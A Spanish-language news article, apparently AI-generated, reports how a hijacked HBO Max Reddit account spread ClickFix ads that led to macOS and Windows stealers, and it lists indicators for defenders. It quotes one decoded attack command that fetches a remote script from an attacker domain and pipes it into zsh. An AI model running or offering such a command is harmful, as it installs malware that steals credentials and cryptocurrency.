Una cuenta de Reddit de HBO Max secuestrada difundió 108 anuncios de malware ClickFix
Hackers secuestraron la cuenta de HBO Max en Reddit para publicar 108 anuncios ClickFix que robaban credenciales y criptomonedas en Windows y macOS.
Texto generado por inteligencia artificial, publicado sin revisión humana. Transparencia IA
Imagen ilustrativa generada con IA
Los atacantes comprometieron la cuenta verificada de HBO Max en Reddit y utilizaron su identidad de confianza para distribuir anuncios maliciosos dirigidos a usuarios de Windows y macOS.
Un informe publicado el 14 de septiembre de 2026 detalla 108 anuncios maliciosos publicados a través de la cuenta u/hbomax durante aproximadamente 48 horas. Investigadores de Hudson Rock y ADAMnetworks vincularon la actividad con PasteSwitch, una operación de malware más amplia basada en técnicas de ingeniería social ClickFix.
Los anuncios no recurrían a descargas maliciosas convencionales. En su lugar, indicaban a las víctimas que copiaran comandos en Windows Run, PowerShell o macOS Terminal, lo que permitía a los atacantes aprovechar la confianza de los usuarios en las herramientas del sistema operativo.
Una cuenta verificada se convirtió en un canal de distribución de malware
El primer anuncio identificado promocionaba lo que parecía ser una aplicación nativa de HBO Max para macOS. Dirigía a los usuarios a hbomaxx[.]us, un sitio diseñado para parecer una página oficial de descarga de software.
Al hacer clic en los controles para unirse o descargar, no se obtenía un instalador convencional. En su lugar, la página mostraba instrucciones para abrir Terminal y pegar un comando proporcionado.
Los investigadores encontraron varios destinos más anunciados a través de la cuenta de Reddit comprometida:
- 40 anuncios redirigían a los usuarios a
hbomaxx[.]app - 36 promocionaban el sitio falso de servicios de IA y desarrollo
codex-craft[.]com - 15 dirigían a
apple.clean-disk-guide[.]com - 11 redirigían a
code-desktop[.]com - Seis promocionaban
hbomax-macos[.]com
Por tanto, la campaña llegó a mucho más que personas que buscaban software de HBO Max. Sus señuelos también estaban dirigidos a desarrolladores, posibles usuarios de servicios de IA y propietarios de macOS que buscaban utilidades de limpieza de disco o del sistema.
El uso de una cuenta corporativa verificada otorgó a los anuncios una potente señal de legitimidad. Los usuarios que podrían rechazar a un anunciante desconocido podían asumir razonablemente que el contenido publicado como HBO Max había superado los controles de la marca y de la plataforma.
No se sabe cómo lograron hacerse con el control de u/hbomax. Tampoco existe información confirmada que indique si se comprometieron otras cuentas de HBO o Warner Bros. Discovery, ni sistemas internos.
ClickFix convierte a la víctima en el mecanismo de ejecución
Los ataques ClickFix suelen presentar la ejecución de comandos como un paso rutinario de solución de problemas o verificación. Una página puede afirmar que el usuario debe corregir un error, completar un CAPTCHA o ejecutar un comando para instalar software aparentemente legítimo.
Este diseño cambia la vía de distribución. En lugar de pedir al navegador que descargue un archivo claramente ejecutable, el atacante persuade a la víctima para que abra una interfaz local de confianza y ejecute manualmente la carga maliciosa.
En macOS, uno de los comandos observados en la campaña estaba oculto mediante codificación Base64. Una vez decodificado, era:
export _watch_v2=97d9d8dc;curl -sL "https://ember-bridge[.]com/curl/a44a37519au/setup.sh"| zsh
El comando crea la variable de entorno _watch_v2, obtiene un script de shell de ember-bridge[.]com y canaliza directamente la respuesta al intérprete Z shell. No es necesario revisar el script descargado antes de ejecutarlo.
Hudson Rock identificó ese dominio como parte de una infraestructura de distribución de malware asociada con PasteSwitch. El backend de la operación puede seleccionar campañas, cargas maliciosas, sistemas operativos y métodos de robo de criptomonedas según las características del visitante.
Esta flexibilidad permite que una misma operación publicitaria distribuya distintas cadenas de ataque a sistemas Windows y macOS. También permite a los operadores alternar entre el robo de credenciales, la carga de malware, aplicaciones de wallet fraudulentas y la manipulación del portapapeles.
Las cargas de macOS robaron credenciales y frases de recuperación de wallets
PasteSwitch distribuyó MacSync, un infostealer diseñado para recopilar datos confidenciales de dispositivos macOS. Entre sus objetivos se encuentran las credenciales de los navegadores, los perfiles de Firefox, información de Telegram, Apple Notes y las contraseñas de macOS.
Otra cadena instalaba un malware descrito como “AMOS helper”. El programa establece persistencia mediante un directorio llamado:
.com.apple.accountsd
El nombre se parece al de un componente del sistema de Apple, lo que potencialmente dificulta su detección durante una inspección superficial. Una vez instalado, el malware puede registrar el equipo en una infraestructura controlada por los atacantes y aceptar nuevas tareas.
La campaña también distribuyó aplicaciones de criptomonedas fraudulentas que suplantaban a Ledger, Trezor Suite y Exodus. Estas aplicaciones buscaban las frases de recuperación de las wallets, lo que puede dar al atacante el control de las criptomonedas asociadas sin necesidad de mantener el acceso al equipo infectado.
Estas cargas independientes generan varios resultados posibles a partir de una misma campaña publicitaria. Una víctima podría perder credenciales del navegador, datos privados de aplicaciones, contraseñas del sistema o activos de criptomonedas. Además, el malware persistente podría proporcionar un punto de apoyo para actividades posteriores.
Las cadenas dirigidas a Windows utilizaron el bypass de AMSI y la ejecución solo en memoria
Los usuarios de Windows se encontraron con instrucciones relacionadas con mshta y PowerShell. Ambos son componentes legítimos de Windows, pero los atacantes suelen abusar de ellos para ejecutar scripts y obtener fases adicionales.
Una de las cadenas identificadas utilizaba un poliglota MP3/HTA: contenido construido de forma que pudiera tratarse como más de un tipo de archivo, según cómo se procesara. La cadena podía crear una tarea programada, iniciar PowerShell de 32 bits y desactivar Microsoft Antimalware Scan Interface, o AMSI.
A continuación, generaba una infraestructura específica para cada víctima utilizando el nombre del equipo y el nombre de usuario. PowerShell ofuscado y shellcode terminaban cargando Amatera Stealer directamente en memoria.
Esta fase final no necesitaba guardarse previamente como un ejecutable convencional en el disco. La carga exclusiva en memoria reduce las evidencias disponibles para los controles de seguridad que analizan principalmente los archivos recién creados, aunque la supervisión de endpoints todavía puede detectar comportamientos asociados.
PasteSwitch también ha distribuido AnimateClipper y ZigClipper. Estos clipboard hijackers supervisan las direcciones de criptomonedas copiadas y las sustituyen por direcciones controladas por los atacantes. Como las cadenas de las wallets son largas y difíciles de verificar visualmente, las víctimas pueden aprobar el destino modificado sin advertir el cambio.
Los equipos de defensa deben buscar comandos, persistencia e infraestructura
Reddit suspendió los anuncios denunciados y remitió el asunto a sus equipos de Security and Safety. Se había contactado con HBO y Warner Bros. Discovery, pero en el momento de la publicación no se había recibido respuesta.
No existe un parche de software para el problema central, porque el ataque depende principalmente del compromiso de cuentas y de la ingeniería social. Las organizaciones deben combinar la búsqueda de amenazas en endpoints con controles más estrictos sobre la publicidad corporativa y las identidades en redes sociales.
Los equipos de seguridad deben bloquear o investigar las conexiones con:
hbomaxx[.]us
hbomaxx[.]app
codex-craft[.]com
apple.clean-disk-guide[.]com
code-desktop[.]com
hbomax-macos[.]com
ember-bridge[.]com
En los endpoints macOS, los equipos de defensa deben buscar el directorio de persistencia .com.apple.accountsd, la variable de entorno _watch_v2 y el acceso a:
/curl/a44a37519au/setup.sh
La telemetría de Windows debe revisarse para detectar ejecuciones inusuales de mshta, creación de tareas programadas, ejecuciones de PowerShell de 32 bits, modificaciones de AMSI, scripts ofuscados, carga de shellcode y procesos que ejecuten cargas directamente en memoria.
Las investigaciones también deben tener en cuenta los indicadores relacionados con MacSync, AMOS helper, Amatera Stealer, AnimateClipper y ZigClipper. Los usuarios de criptomonedas quizá deban comprobar si introdujeron frases de recuperación en aplicaciones sospechosas y si las direcciones de wallets copiadas fueron modificadas antes de realizar transacciones.
Las identidades verificadas no sustituyen al análisis de los comandos
Los usuarios deben tratar como potencialmente maliciosa cualquier instrucción de un sitio web que les pida pegar un comando en Terminal, PowerShell o Windows Run. Esto también se aplica cuando la instrucción se presenta como un CAPTCHA, un instalador de aplicaciones o un procedimiento para reparar un error.
Las organizaciones que controlan cuentas de marca verificadas deben implementar autenticación multifactor resistente al phishing, rotar las credenciales expuestas, revocar las sesiones no reconocidas y revisar los accesos administrativos. La supervisión debe alertar sobre la creación inesperada de anuncios, volúmenes inusuales de campañas o cambios realizados fuera de los flujos de trabajo habituales.
El incidente de HBO Max demuestra cómo una identidad comprometida puede salvar la brecha de confianza que normalmente protege a los usuarios frente a dominios desconocidos. El anuncio puede parecer auténtico. El comando pegado sigue determinando qué ejecuta el equipo.
Fuentes
Este artículo es una reelaboración original basada en las siguientes fuentes.
